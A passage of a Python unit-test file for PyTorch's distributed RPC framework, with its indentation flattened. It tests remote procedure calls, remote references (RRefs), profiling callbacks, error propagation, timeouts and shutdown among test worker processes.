inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
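        # Sanity check that key_averages() can be computed on both profiles
        # without raising.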
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with torch.autograd.profiler.profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with torch.autograd.profiler.profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
            # This barrier prevents a race condition where the main thread exits
            # the context manager before the remote function has run.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
            self.fail("expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
        # Otherwise, some peers could exit early, leaving the others to hit
        # timeout or connection-closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
        # Ensure that an error is raised if a user tries to call
        # local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with torch.autograd.profiler.profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with torch.autograd.profiler.profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
        Tests that it is possible to call an instance method on a remote object
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
        # Test that rpc.enable_gil_profiling(False) results in GIL wait time
        # not being recorded.
        # GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
        # Test that we can start RPC and then immediately shut down locally
        # without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
        # NB: Key ordering is only preserved in Python 3.6+. So here, we
        # manually check that the keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
        # This barrier is needed to ensure that some workers do not exit before
        # others have been brought up, for non-ProcessGroupAgent backends.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
            # The shutdown sequence is not well defined, so we can see any of
            # the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
        # Futures should time out and be marked with a timeout exception.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
        # Ensure that if a new timeout is set, old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
